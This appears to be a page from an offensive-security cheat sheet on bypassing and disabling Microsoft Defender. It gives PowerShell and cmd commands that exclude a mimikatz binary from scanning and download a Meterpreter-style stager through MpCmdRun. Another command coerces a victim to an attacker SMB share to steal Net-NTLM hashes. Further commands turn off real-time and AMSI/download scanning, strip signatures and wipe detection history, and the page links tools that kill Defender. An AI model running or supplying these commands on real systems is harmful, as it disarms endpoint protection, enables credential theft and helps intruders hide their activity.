Defender

Microsoft Defender

https://github.com/0xsp-SRD/MDE_Enum

Add path to exclusions:

PS > $mimi = "C:\Users\snovvcrash\music\mimi\x64\mimikatz.exe"
PS > Add-MpPreference -ExclusionPath $mimi -AttackSurfaceReductionOnlyExclusions $mimi

Download stager without triggering Defender to scan it:

PS > .\MpCmdRun.exe -DownloadFile -Url http://127.0.0.1/met.exe -Path C:\Users\snovvcrash\music\met.exe

Coerce the victim machine to reach the attacker (to steal Net-NTLM):

Cmd > C:\PROGRA~1\WINDOW~1\MpCmdRun.exe -Scan -ScanType 3 -File '\\10.10.13.37\share\file'

Disable Defender

https://github.com/mandiant/commando-vm#pre-install-procedures
https://github.com/swagkarna/Defeat-Defender-V1.2
https://github.com/APTortellini/DefenderSwitch
https://github.com/dosxuz/DefenderStop
https://gist.github.com/fiercebrute/46e0636c0eaf72dcd3df4e280b6792d6
http://www.wxxy-sec.com/?p=154
gpedit.msc > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Real-time Protection > Turn off real-time protection > Enabled ✔
gpedit.msc > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Turn off Microsoft Defender Antivirus > Enabled ✔

Disable real-time protection (proactive):

PS > Set-MpPreference -DisableRealTimeMonitoring $true

Disable scanning all downloaded files and attachments, disable AMSI (reactive):

PS > Set-MpPreference -DisableIOAVProtection $true

Remove signatures (if Internet connection is present, they will be downloaded again):

PS > cd "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0"
PS > .\MpCmdRun.exe -RemoveDefinitions -All
Or
Cmd > "%PROGRAMFILES%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Clear threats history manually:

Cmd > del /S "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\*"

Lower Token Integrity

Last updated 3 months ago